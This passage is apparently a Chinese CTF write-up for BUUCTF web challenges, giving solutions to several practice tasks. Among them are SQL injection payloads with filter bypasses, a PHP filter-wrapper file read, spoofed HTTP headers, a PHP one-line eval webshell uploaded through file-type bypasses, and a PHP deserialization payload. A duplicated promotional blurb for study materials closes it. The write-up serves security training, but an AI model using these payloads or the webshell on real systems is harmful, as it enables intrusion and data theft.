7、[SUCTF 2019]EasySQL注意这个不是极客,是SUCTF的EasySQL
- 方法一:
*,1
- 方法二:
1;set sql_mode=PIPES_AS_CONCAT;select 1
8、[强网杯 2019]随便注
https://cloud.tencent.com/developer/article/2352207?from_column=20421&from=20421
- 方法一:handler命令可以一行一行的显示数据表中的内容
1'; handler
1919810931114514open as
a; handler
aread next;#
- 方法二: 编码逃逸 绕过滤
1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
- 方法三:利用concat拼接
1';use supersqli;set @sql=concat('s','elect flag from
1919810931114514');PREPARE stmt1 FROM @sql;EXECUTE stmt1;#
- 方法四:改名
1';rename table words to word2;rename table
1919810931114514to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE words CHANGE flag data VARCHAR(100);#
改名之后,再输入1' or 1#
即可查到
9、[极客大挑战 2019]LoveSQL
- 方法一:账号中输入
1' union select 1,2,group_concat(password) from l0ve1ysq1;#
密码随便 - 方法二:常规做法
- 爆字段看回显:
1' order by 3 #
正常1' order by 4#
报错,说明有三个字段 - 爆数据库:
1' union select 1,1,database();#
//geek - 爆表:
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#
//geekuser,l0ve1ysq1 - 爆字段(列):
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
//id,username,password - 查看字段(列)内容:
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 #
10、[极客大挑战 2019]Secret File
老规矩,先F12,看到一个链接,href="./Archive_room.php"
,点进去跳转到Archive_room.php页面,再点击SELECT进到end.php页面,什么也没有
用burp suite拦截,看到注释里有secr3t.php
,访问得到代码,进行代码审计,看懂后是php伪协议
在地址栏后面加:secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
页面中出现base64编码,放到在线网站解码即可
11、[极客大挑战 2019]Http
GET /Secret.php HTTP/1.1
Host: node5.buuoj.cn:27557
Referer: https://Sycsecret.buuoj.cn
User-Agent: Syclover
X-Forwarded-For:127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
这三行改成要求即可,如图,右面会显示flag
12、[极客大挑战 2019]Knife
下载后在空白处点击右键,添加数据
因为网站本来就是一个shell的执行页面,所以不用连接文件,直接粘贴过来网址就行,然后密码根据网页提示是Syc,测试连接,成功后再点添加数据,最上面的这条就是
双击点进去,去根目录下找flag,因为一般flag都在根目录下
13、[极客大挑战 2019]Upload
这些文件上传类型的题,假如说中间有步骤做错了,或者上传了多个文件,用蚁剑连不上,那你就销毁靶机,等一会重新启动,一次性做对,再连接就好了。包括上面那些用burp suite 修改参数的也是,重新启动环境即可
一句话木马:
GIF89a
<script language="php">@eval($_POST['pass']);</script>
新建一个 1.txt 文档,里面写上面的一句话木马,然后把后缀改成.phtml
GIF89a
是16进制的GIF 用于绕过文件检测,POST['']
里面是连接的密码,post请求就用post连接
在burp suite中把Content-Type
改为 image/jpeg
然后点提交
尝试访问upload目录,可以看到上传成功
然后用蚁剑连接,网页路径后加/upload/1.phtml
,密码是 pass
去根目录下找即可
14、[ACTF2020 新生赛]Upload
第一步:上传上面那个 1.phtml 文件,提示只能上传jpg、png、gif
那就把上面的 1.phtml 改成 1.jpg上传,注意我这里在里面改了密码 guoli
然后在bp里把 1.jpg 再改成 1.phtml,然后左上角点发送
可以看到上传成功
把后面的地址放到后面,用蚁剑连接,成功了点添加
然后在第一个点进去,去根目录找即可
15、[极客大挑战 2019]BabySQL
这是前两个的升级,采用双写绕过
测试回显:
账号: 1' ununionion seselectlect 1,2,3#
密码随便,回显正常
1' ununionion seselectlect 1,2,3,4#
就报错,所以有三个字段
后续与[极客大挑战 2019]LoveSQL原理一致,用双写绕过即可, 可以看到下面这些都被过滤了
爆当前库名: 1'ununionion seselectlect 1,2,database()#
// geek
爆所有库名: 1'ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#
//六个库 information_schema, mysql, performance_schema, test, ctf, geek
爆ctf库的表名: 1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#
爆字段名:1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'#
查看字段内容(因为flag不在当前数据库,所以用ctf.Flag):1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag #
16、[极客大挑战 2019]PHP
又是这个猫猫
在地址栏后面输入: ?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
即可得到falg
具体做法:
网页提示了有备份,猜测组合出是www.zip
常见的网站源码备份文件后缀:
.tar.gz, .zip, .rar, .tar,.php.bak, .swp,
常见的网站源码备份文件名:
web, website, backup, back, www, wwwroot, temp
猜一下组合尝试就好,或者在kali中,用dirsearch扫描常见备份后缀文件
dirsearch -u http://dae1596f-6683-41e4-8506-e4566bca64af.node5.buuoj.cn:81/ | grep -E '\.zip|\.tar\.gz|\.rar|\.php\.bak'
时间有点长,还不如猜的组合快,然后观察,其他都是500多B,只有这个是6KB,大概率是这个
在网址后面加上www.zip下载,打开如图:
打开flag,啥也不是
打开class.php
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
代码审计,大概意思就是,如果
username= 'admine' 和 password = '100'
才会输出flag
访问index.php
unserialize():
unserialize — 从已存储的表示中创建 PHP 的值列化后的字符串。
若被反序列化的变量是一个对象,在成功地重新构造对象之后,PHP 会自动地试图去调用 __wakeup()成员函数(如果存在的话)
参考:https://blog.csdn.net/qq_43622442/article/details/105623384
在这里,我们可以将 php 代码 以文本的方式显示
<?php
class Name{
private $username = 'admine';
private $password = '100';
}
$select = new Name();
$res=serialize(@$select);
echo $res
?>
在php中运行上面代码,没有环境也可以用在线网站
结果是:O:4:"Name":2:{s:14:"Nameusername";s:6:"admine";s:14:"Namepassword";s:3:"100";}
当成员属性数目大于实际数目时才可绕过wakeup
所以我们要将 2 改为 3 或者 比二大的数字
同时,我们要将口变为 %00 若果不写 在我们复制的时候就会减少空格,然后就ok
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
17、[ACTF2020 新生赛]BackupFile
在地址栏后面加:
index.php.bak
下载下来打开和上题一样是代码审计
在地址栏后面加:
?key=123
即可得到flag
具体做法:
和上一题一样,因为标题说是BackupFile,即备份文件,所以用组合尝试,或者kali中用dirsearch扫描常见备份后缀文件
dirsearch -u http://94f3591a-a175-4d4c-978d-56ee5c6a0995.node5.buuoj.cn:81/ | grep -E '\.zip|\.tar\.gz|\.rar|\.php\.bak'
我参考了别的大佬的wp,知道了是index.php.bak,但是我扫出来文件大小和别的大小都是一样的,我也不知道他们是怎么看出来的,感觉还得是尝试组合
剩下就是,下载好打开文件,代码审计,看懂后,再地址栏后面加?key=123
即可
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
[外链图片转存中…(img-PZPvrUIn-1715482272561)]
[外链图片转存中…(img-078PoRyv-1715482272562)]
[外链图片转存中…(img-oCqkjRlE-1715482272562)]
[外链图片转存中…(img-xgPQ7QQA-1715482272562)]
[外链图片转存中…(img-B2nUWjfW-1715482272563)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!